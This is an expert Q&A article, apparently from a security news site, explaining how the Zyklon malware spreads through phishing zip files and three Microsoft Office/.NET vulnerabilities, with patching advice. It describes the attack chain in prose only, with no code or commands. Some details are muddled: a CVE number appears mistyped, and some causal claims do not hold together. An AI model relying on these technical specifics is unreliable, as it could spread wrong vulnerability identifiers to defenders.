A new malware called Zyklon manipulates three Microsoft Office vulnerabilities. How does Zyklon malware work, and...
what vulnerabilities does it exploit?
Zyklon malware lurks in a zip file containing up to three malicious Microsoft Office files.
The botnet malware comes to life when an innocent user accidentally opens a zipped file that is typically attached to a phishing email. The exploit executes a PowerShell script to download a final payload from an attacker's command-and-control server. From there, the attacker can collect passwords and cryptocurrency wallet data, enabling him to use them against the target enterprise systems.
The first vulnerability the Zyklon malware exploits is a bug in the .NET framework -- CVE-2017-8789 -- where a malicious document gives the attacker the ability to remotely install programs, change data and create privileged accounts. Clicking on or hovering over an embedded Object Linking and Embedding object automatically downloads a malicious .doc file from an URL in the background of the system. However, the .NET framework was patched by Microsoft in October 2017.
The second vulnerability is the memory corruption flaw in the Microsoft Equation Editor -- CVE-2017-11882. An attacker can take advantage of this flaw to execute arbitrary code. Because no user interaction is required after the user opens the Editor, it took 17 years for Microsoft to recognize this flaw, but it was patched in November 2017.
The third vulnerability is the Dynamic Data Exchange (DDE) protocol. During this past year, attackers have succeeded in crafting macro-based malware to exploit this vulnerability to launch malicious droppers. While no patches have been released, Microsoft considers the DDE a product feature, not a vulnerability. As a precaution, however, Microsoft published practical advice on changing system settings in a registry file in order to safely disable the feature.
If these three vulnerabilities are used together, an attacker could collect passwords and cryptocurrency wallet data to launch denial-of-service attacks against the targeted systems. Enterprises and users alike should make sure these Microsoft vulnerabilities are fully patched to prevent any Zyklon malware infections.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Dig Deeper on Microsoft Windows security
Related Q&A from Judith Myerson
Multiple Border Gateway Protocol vulnerabilities were found impacting security in the Quagga routing software. Expert Judith Myerson explains how ... Continue Reading
A previously disclosed flaw found in Broadcom's Wi-Fi controller chips is now believed to affect the Lenovo ThinkPad. Learn how this vulnerability ... Continue Reading
ICS-CERT issued a warning about a new vulnerability in Nortek Linear eMerge E3 products. Discover what this vulnerability is and how it affects ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.